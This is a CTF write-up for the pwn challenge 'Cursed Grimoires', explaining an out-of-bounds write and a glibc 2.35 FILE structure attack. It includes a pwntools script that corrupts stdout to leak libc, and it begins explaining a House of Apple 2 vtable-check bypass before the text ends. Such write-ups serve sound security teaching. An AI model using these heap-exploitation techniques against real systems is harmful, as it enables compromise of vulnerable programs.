STACK the Flags CTF 2022

WriteUp · 1 year ago (2022) · admin

Last weekend, I spent my time competing at STACK the Flags CTF 2022 held by GovTech SG with team PDKT then sad. We got 2nd place in the Open Category. Thanks a lot to GovTech SG for the amazing CTF!

In this CTF, I managed to solve all of the pwn challenges. Today I will write up one of them, Cursed Grimoires, because my solution relies on a FILE Structure Attack against the recent glibc 2.35. (I promised earlier to continue my FILE Structure Attack series, so I will make the FILE structure part of this writeup as detailed as possible.)

I recommend reading my first article about the FILE Structure Attack here to get a basic understanding of how the attack works. You can think of this post as the second part of that article, focused only on glibc 2.35.

Cursed Grimoires

Initial Analysis

We were given a zip file containing the challenge binary called cursed_grimoires and the libc file that is being used to run the binary. Let’s start the analysis by checking the properties of the binary via checksec.

╰─❯ checksec cursed_grimoires
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

As we can see, the binary has the following protections:

  • Full RELRO: We can’t modify the GOT.
  • Canary found: The binary guards against stack buffer overflows by storing a canary value on the stack (the program aborts if an overflow overwrites it with an incorrect value).
  • NX enabled: The stack isn’t executable (we can’t jump to shellcode placed on the stack).
  • PIE enabled: The base address of the binary, and therefore the addresses of its functions, is randomized on each execution.

Now, let’s check the libc version

╰─❯ ./libc.so.6
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.

Okay, the binary uses glibc 2.35, which is quite hard to exploit (for example, the classic __malloc_hook and __free_hook overwrite targets stopped working in glibc 2.34).

Now that we know the properties, the mitigations look quite strong. Let’s continue our analysis by decompiling the binary’s functions one by one.

main

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  setup_IO(argc, argv, envp);
  v3 = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      printf("\nEnter choice => ");
      __isoc99_scanf("%d", &v3);
      if ( v3 != 1 )
        break;
      create_grimoire();
    }
    if ( v3 != 2 )
      exit(0);
    edit_grimoire();
  }
}

The main function calls menu() on each iteration, and there are three options that we can select with our input: create_grimoire, edit_grimoire, and exit (any choice other than 1 or 2 calls exit(0)). Let’s continue our analysis by decompiling those functions, starting with menu.

unsigned __int64 menu()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  puts(s);
  puts("1. Create Grimoire (Only once)");
  puts("2. Edit Grimoire");
  puts("3. Finish Grimoire");
  return v1 - __readfsqword(0x28u);
}

Okay, this method just prints the available menus and the number that we should input to choose one of the available menus.

create_grimoire

unsigned __int64 create_grimoire()
{
  size_t size; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  if ( !GRIMOIRE )
  {
    printf("Size of grimoire => ");
    size = 0LL;
    __isoc99_scanf("%zu", &size);
    while ( getchar() != 10 )
      ;
    GRIMOIRE = (char *)malloc(size);
    printf("Write your contents => ");
    fgets(GRIMOIRE, size - 1, stdin);
  }
  return v2 - __readfsqword(0x28u);
}

From the decompiled output, we can see that the create_grimoire method performs three sequential operations:

  • Check whether the global variable GRIMOIRE is null. This means that we can effectively call create_grimoire only once per execution.
  • Ask for the size of the grimoire, and then call malloc to create a new chunk of that size.
  • Ask for the content of the newly created chunk.

One thing to notice in this method is that we can request a very large chunk, because the size isn’t restricted at all. Keep this in mind, because it will be useful later. Let’s move on to the edit_grimoire method.

edit_grimoire

unsigned __int64 edit_grimoire()
{
  char v1; // [rsp+3h] [rbp-Dh]
  int v2; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  if ( GRIMOIRE )
  {
    printf("Index to edit => ");
    __isoc99_scanf("%d", &v2);
    while ( getchar() != 10 )
      ;
    printf("Replacement => ");
    v1 = getchar();
    while ( getchar() != 10 )
      ;
    GRIMOIRE[v2] = v1;
  }
  return v3 - __readfsqword(0x28u);
}

At a glance, this method lets us edit the content of the allocated chunk, one char per call: we give an index, and the byte stored at that index is replaced with the new value that we provide.

If we read this method carefully, we notice a bug: nothing checks whether the index that we give is valid (that is, still inside the allocated chunk). Because the index is a signed 32-bit int, we get an Out-Of-Bounds write to any address within roughly ±2 GiB of the chunk, both after and before it.
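
To make the reach of this bug concrete, here is a minimal Python sketch that models GRIMOIRE[v2] with v2 stored as a 32-bit signed int. The helper names and the example chunk address are illustrative assumptions, not part of the challenge.

```python
import ctypes

MASK64 = (1 << 64) - 1

def as_c_int(value: int) -> int:
    """Wrap a Python integer the way a 32-bit signed C int stores it."""
    return ctypes.c_int32(value).value

def target_address(chunk_addr: int, index: int) -> int:
    """Address touched by GRIMOIRE[index] when index is a C int."""
    return (chunk_addr + as_c_int(index)) & MASK64

# Example chunk address (assumed for illustration only).
chunk = 0x00007ffff7c9c010

print(hex(target_address(chunk, 0x100000)))  # a byte far past the chunk
print(hex(target_address(chunk, -0x10)))     # a byte before the chunk
```

Positive indices walk toward higher addresses and negative indices toward lower ones, so the only real limit is the 32-bit range of the index.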

To summarize, some important notes that we have taken from our analysis:

  • There are three menus that we can choose (create, edit, and exit).
  • We can allocate one chunk with any size that we want.
  • There is a bug in the edit method which leads us to OOB write on any address that we want (relative to our allocated chunk’s address)

Exploitation

Now, based on those notes, we need to think about how to turn the OOB bug into Remote Code Execution (RCE). The obstacle so far:

  • Even though we have an OOB write, due to ASLR (address randomization) we know neither the address of our chunk in the heap nor the offset between our chunk and a target address.

Leveraging the OOB bug with malloc behavior

So, what should we do? Remember that this binary lets us allocate a chunk of any size. Let’s check the malloc manual. It turns out there are some interesting notes in the output of man malloc.

NOTES
       By default, Linux follows an optimistic memory allocation strategy. This means that when malloc() returns non-NULL there is no guarantee that the memory really is available. In case it turns out that the system is out of memory, one or more processes will be killed by the OOM killer. For more information, see the description of /proc/sys/vm/overcommit_memory and /proc/sys/vm/oom_adj in proc(5), and the Linux kernel source file Documentation/vm/overcommit-accounting.rst.

       Normally, malloc() allocates memory from the heap, and adjusts the size of the heap as required, using sbrk(2). When allocating blocks of memory larger than MMAP_THRESHOLD bytes, the glibc malloc() implementation allocates the memory as a private anonymous mapping using mmap(2).

Based on the notes, if we call malloc() with a big size, our chunk is placed in an mmapped page rather than in the heap area (MMAP_THRESHOLD defaults to 128 KiB). And from this article that I found, we learn that a new page created by mmap sits at a consistent offset from the libc base address. To prove this, let’s fire up gdb, run the binary multiple times, and allocate a chunk of size 1000000 each time.
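
As a rough mental model of that rule, the sketch below decides whether a request would be served by mmap. It assumes the default threshold of 128 KiB documented in mallopt(3) and ignores the details that glibc applies in practice (size padding, the dynamic threshold, and the fact that mmap is only considered when the existing heap can’t satisfy the request). The function name is made up for this example.

```python
# Default value of M_MMAP_THRESHOLD according to mallopt(3).
DEFAULT_MMAP_THRESHOLD = 128 * 1024

def likely_served_by_mmap(request_size: int,
                          threshold: int = DEFAULT_MMAP_THRESHOLD) -> bool:
    """Rough model only: big requests go to mmap, small ones to the heap.

    The exact behaviour right at the boundary is an approximation here.
    """
    return request_size >= threshold

print(likely_served_by_mmap(1000000))  # the size used in this writeup
print(likely_served_by_mmap(0x100))    # a typical small heap chunk
```

The size 1000000 used in this post is far above the threshold, so the exact boundary behaviour doesn’t matter for the exploit.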

gef➤  x/gx &GRIMOIRE
0x55e0067dd030 <GRIMOIRE>:      0x00007f3b78939010
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x000055e0067d9000 0x000055e0067da000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067da000 0x000055e0067db000 0x0000000000001000 r-x /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067db000 0x000055e0067dc000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067dc000 0x000055e0067dd000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067dd000 0x000055e0067de000 0x0000000000003000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067de000 0x000055e0067df000 0x0000000000005000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e007bc6000 0x000055e007be7000 0x0000000000000000 rw- [heap]
0x00007f3b78939000 0x00007f3b78a31000 0x0000000000000000 rw-
0x00007f3b78a31000 0x00007f3b78a59000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/libc.so.6

As you can see, the chunk was placed not in the heap but in a new page created by mmap, directly before the libc (the offset is 0x00007f3b78a31000 - 0x00007f3b78939010 = 0xf7ff0). Let’s run it one more time to confirm.

gef➤  x/gx &GRIMOIRE
0x555555558030 <GRIMOIRE>:      0x00007ffff7c9c010
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555559000 0x000055555555a000 0x0000000000005000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055555555a000 0x000055555557b000 0x0000000000000000 rw- [heap]
0x00007ffff7c9c000 0x00007ffff7d94000 0x0000000000000000 rw-
0x00007ffff7d94000 0x00007ffff7dbc000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/libc.so.6

Yup, we can confirm that when we allocate a big chunk, libc_base_address is at chunk_address + 0xf7ff0 (for this chunk size in this environment). With this piece of information, we can leverage our OOB bug to overwrite any writable byte in the libc area by setting the index to 0xf7ff0 + libc_target_offset.
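
The arithmetic can be double-checked with a few lines of Python. The addresses are copied from the two gdb sessions above; the stdout offset is derived from the gdb output shown later in this post (where _IO_write_base is printed as _IO_2_1_stdout_+131), and the helper name edit_index is an assumption made for this sketch.

```python
# (chunk address, libc base) pairs taken from the two gdb runs above.
runs = [
    (0x00007f3b78939010, 0x00007f3b78a31000),
    (0x00007ffff7c9c010, 0x00007ffff7d94000),
]
offsets = {libc_base - chunk for chunk, libc_base in runs}
print([hex(o) for o in offsets])  # one distinct value means the offset is stable

OFFSET_TO_LIBC = 0xf7ff0

def edit_index(libc_target_offset: int) -> int:
    """Index to pass to edit_grimoire to reach libc_base + libc_target_offset."""
    return OFFSET_TO_LIBC + libc_target_offset

# In the second run, gdb prints 0x7ffff7fae803 as _IO_2_1_stdout_+131.
stdout_addr = 0x7ffff7fae803 - 131
stdout_offset = stdout_addr - 0x00007ffff7d94000
print(hex(stdout_offset), hex(edit_index(stdout_offset)))
```

The resulting index is well below 2^31, so it fits in the signed int that edit_grimoire reads with %d.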

Getting a libc leak

Now that we have the power to overwrite any writable area of the loaded libc, what should we do with it? Remember that so far we don’t have any libc address leak, so a good first step is to find a way to get one.

One way that I could think of is a FILE Structure Attack. If this is your first time hearing about it, I wrote up the basics in one of my blog’s articles. Reading that article first will give you a strong foundation for understanding the exploit for this challenge.

One FILE Structure Attack trick that leaks a libc address is described in this article. The article explains the trick, but I will break it down again step by step, following what I did to understand it.

Remember that menu() is called on each iteration and that it calls puts. So, following that article, if we dive into the implementation of puts in the glibc source code, we will find a way to get a libc leak.

Let’s break it down step by step, starting from the puts method itself.

int
_IO_puts (const char *str)
{
  int result = EOF;
  size_t len = strlen (str);
  _IO_acquire_lock (stdout);

  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len
      && _IO_putc_unlocked ('\n', stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (stdout);
  return result;
}

weak_alias (_IO_puts, puts)
libc_hidden_def (_IO_puts)

puts is an alias of _IO_puts. As you can see, _IO_puts calls _IO_sputn (stdout, str, len), which, based on this LOC in the glibc source code, is an alias of _IO_XSPUTN (__fp, __s, __n). That means it jumps to the pointer stored in the __xsputn slot of the stdout FILE’s vtable.

Inspecting it via GDB (or by reading the source code), the stdout vtable maps __xsputn to the _IO_new_file_xsputn method.

gef➤  print _IO_2_1_stdout_
$4 = {
  file = {
    _flags = 0xfbad2887,
    _IO_read_ptr = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_read_end = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_read_base = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_base = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_ptr = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_end = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
...
    _wide_data = 0x7ffff7fad9a0 <_IO_wide_data_1>,
  },
  vtable = 0x7ffff7faa600 <__GI__IO_file_jumps>
}
gef➤  print __GI__IO_file_jumps
$5 = {
...
  __overflow = 0x7ffff7e20e40 <_IO_new_file_overflow>,
  __underflow = 0x7ffff7e20b30 <_IO_new_file_underflow>,
  __uflow = 0x7ffff7e21de0 <__GI__IO_default_uflow>,
  __pbackfail = 0x7ffff7e23300 <__GI__IO_default_pbackfail>,
  __xsputn = 0x7ffff7e1f680 <_IO_new_file_xsputn>,
...
  __write = 0x7ffff7e1ef40 <_IO_new_file_write>,
}

So now, let’s check the code.

size_t
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
{
  const char *s = (const char *) data;
  size_t to_do = n;
  int must_flush = 0;
  size_t count = 0;

...

  if (to_do + must_flush > 0)
    {
      size_t block_size, do_write;
      /* Next flush the (full) buffer. */
      if (_IO_OVERFLOW (f, EOF) == EOF)
	/* If nothing else has to be written we must not signal the
	   caller that everything has been written.  */
	return to_do == 0 ? EOF : n - to_do;

      /* Try to maintain alignment: write a whole number of blocks.  */
      block_size = f->_IO_buf_end - f->_IO_buf_base;
      do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);

      if (do_write)
	{
	  count = new_do_write (f, s, do_write);
	  to_do -= count;
	  if (count < do_write)
	    return n - to_do;
	}

...

}
libc_hidden_ver (_IO_new_file_xsputn, _IO_file_xsputn)

If you read the code, it calls _IO_OVERFLOW (f, EOF) before calling new_do_write to write the actual string that we want to print. Based on the vtable that we saw in gdb (_IO_file_jumps), calling _IO_OVERFLOW is equivalent to jumping to _IO_new_file_overflow. Let’s check the source of that method.

int
_IO_new_file_overflow (FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      ...
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);
  ...
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

When this method is called from _IO_new_file_xsputn, the argument passed for ch is EOF. Notice this interesting LOC:

  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);

If we read the _IO_do_write method and trace the calls inside it:

int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
  return (to_do == 0
	  || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);

...

}

...
#define _IO_SYSWRITE(FP, DATA, LEN) JUMP2 (__write, FP, DATA, LEN)
...

ssize_t
_IO_new_file_write (FILE *f, const void *data, ssize_t n)
{
  ssize_t to_do = n;
  while (to_do > 0)
    {
      ssize_t count = (__builtin_expect (f->_flags2
                                         & _IO_FLAGS2_NOTCANCEL, 0)
			   ? __write_nocancel (f->_fileno, data, to_do)
			   : __write (f->_fileno, data, to_do));
      if (count < 0)
	{
	  f->_flags |= _IO_ERR_SEEN;
	  break;
	}
      to_do -= count;
      data = (void *) ((char *) data + count);
    }
  n -= to_do;
  if (f->_offset >= 0)
    f->_offset += n;
  return n;
}

As you can see, _IO_do_write is an alias of _IO_new_do_write, which calls new_do_write, which in turn calls _IO_SYSWRITE (fp, data, to_do). _IO_SYSWRITE jumps to the pointer stored in the vtable’s __write slot, which, based on the stdout vtable that we saw before, is _IO_new_file_write. Finally, this method calls write(f->_fileno, data, to_do).

To summarize, below is the call chain that we can trigger when we call puts:

puts(str)
|_ _IO_new_file_xsputn (stdout, str, len)
   |_ _IO_new_file_overflow (stdout, EOF)
      |_ new_do_write(stdout, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)
         |_ _IO_new_file_write(stdout, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)
            |_ write(stdout->fileno, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)

As the chain summary shows, when puts reaches _IO_OVERFLOW, it can end up calling write(stdout->_fileno, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base).

Back to the gdb output of stdout that we saw before: stdout->_fileno is 1, and both stdout->_IO_write_base and stdout->_IO_write_ptr currently point to the same address, which is inside the libc region. Taking the stdout->_IO_write_base address from that output (0x7ffff7fae803), let’s inspect its content.

gef➤  tele 0x7ffff7fae803
0x00007ffff7fae803│+0x0000: 0xfafa70000000000a ("\n"?)
0x00007ffff7fae80b│+0x0008: 0xffffff00007ffff7
...
gef➤  tele 0x7ffff7fae803+5
0x00007ffff7fae808│+0x0000: 0x00007ffff7fafa70  →  0x0000000000000000
0x00007ffff7fae810│+0x0008: 0xffffffffffffffff
...

As you can see, there is a libc address in the memory pointed to by _IO_write_base, specifically at _IO_write_base+5. So, if we can somehow overwrite the _IO_write_ptr of stdout so that it no longer equals _IO_write_base (making _IO_write_ptr > _IO_write_base), we will get a libc leak when puts is called: once puts reaches _IO_OVERFLOW, it eventually calls write(1, _IO_write_base, _IO_write_ptr - _IO_write_base), which prints the bytes between _IO_write_base and _IO_write_ptr.
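
The effect can be simulated offline. The sketch below rebuilds the 16 bytes at _IO_write_base from the two quadwords in the telescope output above and models the write call as a simple slice. The function simulated_write is a stand-in written for this example, not a glibc or pwntools API.

```python
import struct

# The two little-endian quadwords that gdb shows at 0x7ffff7fae803.
memory_at_write_base = struct.pack("<QQ", 0xfafa70000000000a, 0xffffff00007ffff7)

def simulated_write(buf: bytes, write_base: int, write_ptr: int) -> bytes:
    """Model write(1, write_base, write_ptr - write_base).

    buf holds the memory that starts at write_base.
    """
    length = max(write_ptr - write_base, 0)
    return buf[:length]

write_base = 0x7ffff7fae803

# Untouched stdout: write_ptr == write_base, so nothing extra is printed.
print(simulated_write(memory_at_write_base, write_base, write_base))

# After raising write_ptr, the bytes behind write_base are sent to us.
leak = simulated_write(memory_at_write_base, write_base, write_base + 16)
leaked_ptr = struct.unpack("<Q", leak[5:13])[0]
print(hex(leaked_ptr))
```

Skipping the first five bytes is what lines the pointer up, which is why the exploit script slices the received data with [5:].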

However, note that there are some constraints that we need to fulfill to execute that chain successfully:

  • In _IO_new_file_overflow, we need to pass these checks before _IO_do_write is called:
    • if (f->_flags & _IO_NO_WRITES) needs to evaluate to False.
      • _IO_NO_WRITES is 0x0008, which means stdout->_flags & 0x0008 should be 0.
    • if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL) needs to evaluate to False.
      • f->_IO_write_base == NULL is always False because _IO_write_base points into the libc area.
      • (stdout->_flags & _IO_CURRENTLY_PUTTING) == 0 needs to be False as well. _IO_CURRENTLY_PUTTING is 0x0800, which means stdout->_flags & 0x0800 should be non-zero.
    • if (ch == EOF) needs to evaluate to True.
      • This is always satisfied on this path because _IO_new_file_xsputn passes EOF as ch.
  • Moving on to new_do_write, we need to skip the second if condition (the _IO_SYSSEEK branch), so we need to:
    • Make if (fp->_flags & _IO_IS_APPENDING) evaluate to True. _IO_IS_APPENDING is 0x1000.

So, based on the above constraints, the value that we need to set for stdout->_flags is 0x1800, so that:

(_flags & _IO_NO_WRITES)         == 0
(_flags & _IO_CURRENTLY_PUTTING) != 0
(_flags & _IO_IS_APPENDING)      != 0

Now, with the OOB bug, we can get a libc leak. What we need to do:

  • Overwrite stdout->_flags with 0x1800.
  • Overwrite the last byte of stdout->_IO_write_ptr so that it is larger than stdout->_IO_write_base.

By doing this, we will get a libc leak when the binary prints the menu.

Let’s start building our exploit by creating some helpers:

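from pwn import *

# r is a pwntools tube (process or remote) connected to the challenge.

def create(r, size, content):
    # Menu 1: allocate the grimoire with the given size and initial content
    r.sendlineafter(b'=> ', b'1')
    r.sendlineafter(b'=> ', str(size).encode())
    r.sendlineafter(b'=> ', content)

def edit(r, offset, val):
    # Menu 2: write the single byte val at GRIMOIRE[offset]
    r.sendlineafter(b'=> ', b'2')
    r.sendlineafter(b'=> ', str(offset).encode())
    r.sendlineafter(b'=> ', bytes([val]))

def exit_binary(r):
    # Menu 3: make the binary call exit(0), then hand the session to the user
    r.sendlineafter(b'=> ', b'3')
    r.interactive()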

And then, allocate a big chunk:

# Create a big chunk so that it is placed in a new page created by mmap
# (to be precise, at libc_base - 0xf7ff0)
chunk_size      = 1000000
offset_to_libc  = 0xf7ff0
create(r, chunk_size, b'a'*8)

Now, let’s start overwriting the _flags

'''
Leak libc base via stdout
'''
# Prepare the correct offset for stdout and stderr
stdout_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stdout_']
stderr_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stderr_']
log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')
log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')

# Overwrite stdout->_flags to 0x1800
flags_offset = 0x0  # stdout->_flags = &stdout + 0x0
flags = p32(0x1800)
for i in range(len(flags)):
    edit(r, stdout_offset_from_chunk+flags_offset+i, flags[i])
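
Because each edit call changes a single byte and the program keeps printing through stdout between calls, the intermediate values of _flags are live too. The sketch below lists the planned writes and the value that _flags holds after each one. The base index 0x312770 is an illustrative assumption (0xf7ff0 plus a stdout offset of 0x21a780); in the real script it comes from libc.symbols. Both helper names are made up for this example.

```python
import struct

def plan_byte_edits(base_index: int, data: bytes):
    """List of (index, byte) pairs, one per edit() call."""
    return [(base_index + i, b) for i, b in enumerate(data)]

def intermediate_values(original: int, data: bytes):
    """32-bit value of the field after each single-byte write."""
    raw = bytearray(struct.pack("<I", original))
    states = []
    for i, b in enumerate(data):
        raw[i] = b
        states.append(struct.unpack("<I", bytes(raw))[0])
    return states

new_flags = struct.pack("<I", 0x1800)
for index, byte in plan_byte_edits(0x312770, new_flags):
    print(hex(index), hex(byte))

# Starting from the original stdout->_flags seen in gdb.
print([hex(v) for v in intermediate_values(0xfbad2887, new_flags)])
```

None of the intermediate values sets _IO_NO_WRITES or clears _IO_CURRENTLY_PUTTING, so under this model the menu keeps printing normally while the flags are rewritten.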

Now that we have successfully overwritten the stdout flags, let’s overwrite the _IO_write_ptr. After we do the edit, we will get a libc leak immediately because the binary will print the menu.

# Overwrite the LSB of stdout->_IO_write_ptr so that it is larger than _IO_write_base
write_ptr_offset = 0x28 # stdout->_IO_write_ptr = &stdout + 0x28
write_ptr_lsb    = 0x50 # Any value above the LSB of _IO_write_base (0x03) works. I chose 0x50
edit(r, stdout_offset_from_chunk+write_ptr_offset, write_ptr_lsb)

# Now, when the binary calls menu() (which will call puts()),
# it leaks a libc address, which is the address of _IO_stdfile_1_lock
out = r.recvn(16)[5:]  # recvn waits until exactly 16 bytes have arrived
leaked_libc = u64(out[:8])
log.info(f'Leaked libc  : {hex(leaked_libc)}')
libc_base = leaked_libc-libc.symbols['_IO_stdfile_1_lock']
log.info(f'Libc base    : {hex(libc_base)}')
libc.address = libc_base
chunk_addr = libc_base - offset_to_libc
log.info(f'Chunk addr   : {hex(chunk_addr)}')

 

[Screenshot: output of the script so far]

 

Above is the result of our current script. We have successfully retrieved a libc leak. Time to move on to the next step, which is gaining code execution.

Gaining Remote Code Execution (RCE)

Up until now, we have:

  • OOB write to libc area.
  • Libc base address from the leak.

We need to leverage the OOB bug and the leaked libc base address to gain RCE. One thing that comes to mind is what I learned from the recent discussion about gaining RIP control through a FILE structure attack in glibc 2.35.

To give some context, in old versions of glibc we could overwrite file->vtable with the address of a fake vtable, so that when a method called, say, _IO_OVERFLOW, it jumped to the address that we set in our fake vtable instead of the real function.

However, this has been mitigated: glibc now checks whether the vtable stored in the FILE lies in the correct region. Check the LOCs below:

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)

#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)

# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))

#define _IO_JUMPS_FILE_plus(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)

For example, when a method calls _IO_OVERFLOW, it jumps to the pointer stored in the vtable’s __overflow slot, but before the jump it first validates that the vtable pointer lies in the valid area by calling IO_validate_vtable.

So the trick where we set up a fake vtable to jump to a method outside the vtable section no longer works. However, because the check only validates whether the vtable pointer is inside the vtable region, we can still misalign the vtable (for example, shift it by one entry, so that when a function calls _IO_OVERFLOW, it jumps to the __underflow entry instead).
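
The fast path of IO_validate_vtable boils down to one unsigned comparison, which the following sketch reproduces with 64-bit wraparound. The section bounds used here are hypothetical placeholders (the real __start___libc_IO_vtables and __stop___libc_IO_vtables values are not shown in this post); the two vtable addresses are the ones printed by gdb in this post.

```python
MASK64 = (1 << 64) - 1

def in_vtable_section(vtable_ptr: int, section_start: int, section_stop: int) -> bool:
    """Fast-path test of IO_validate_vtable, using uintptr_t arithmetic."""
    section_length = (section_stop - section_start) & MASK64
    offset = (vtable_ptr - section_start) & MASK64  # wraps if ptr < start
    return offset < section_length

# Hypothetical section bounds, chosen only so the example is runnable.
START, STOP = 0x7ffff7fa9000, 0x7ffff7fab000

IO_FILE_JUMPS = 0x7ffff7faa600   # from the gdb output in this post
IO_WFILE_JUMPS = 0x7ffff7faa0c0  # from the gdb output in this post

print(in_vtable_section(IO_FILE_JUMPS, START, STOP))      # genuine vtable
print(in_vtable_section(IO_FILE_JUMPS + 8, START, STOP))  # misaligned by one entry
print(in_vtable_section(IO_WFILE_JUMPS, START, STOP))     # a different real vtable
print(in_vtable_section(0x55555555b2a0, START, STOP))     # fake vtable on the heap
```

Only the pointer’s position relative to the section is tested, so any address inside the section passes, including a shifted one or another vtable such as _IO_wfile_jumps.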

People have tried to find ways around this check, and recently, in this article, kylebot found that glibc performs the check only when jumping through the _IO_JUMPS_FUNC macro; it doesn’t perform it when jumping through the macro for the wide vtable, _IO_WIDE_JUMPS_FUNC.

It also turns out that another article, published a few months earlier, abuses the same finding. The method is called House of Apple 2, and it was posted by roderick01 in this article. I’ll try to explain it in more detail based on my understanding of these two blogs.

Remember that the mitigation implemented in recent glibc only checks whether the vtable stored in the FILE is still in the correct region. The standard vtable used for the standard files (stdin, stdout, stderr) is _IO_file_jumps, but there are in fact many other vtables in the region that we can use, and one of them is _IO_wfile_jumps. Below are the default entries of _IO_wfile_jumps printed via gdb:

gef➤  print __GI__IO_wfile_jumps
$11 = {
  __dummy = 0x0,
  __dummy2 = 0x0,
  __finish = 0x7ffff7e20070 <_IO_new_file_finish>,
  __overflow = 0x7ffff7e1a410 <__GI__IO_wfile_overflow>,
  __underflow = 0x7ffff7e19050 <__GI__IO_wfile_underflow>,
  __uflow = 0x7ffff7e178c0 <__GI__IO_wdefault_uflow>,
  __pbackfail = 0x7ffff7e17680 <__GI__IO_wdefault_pbackfail>,
  __xsputn = 0x7ffff7e1a8c0 <__GI__IO_wfile_xsputn>,
  __xsgetn = 0x7ffff7e1f330 <__GI__IO_file_xsgetn>,
  __seekoff = 0x7ffff7e197d0 <__GI__IO_wfile_seekoff>,
  __seekpos = 0x7ffff7e22530 <_IO_default_seekpos>,
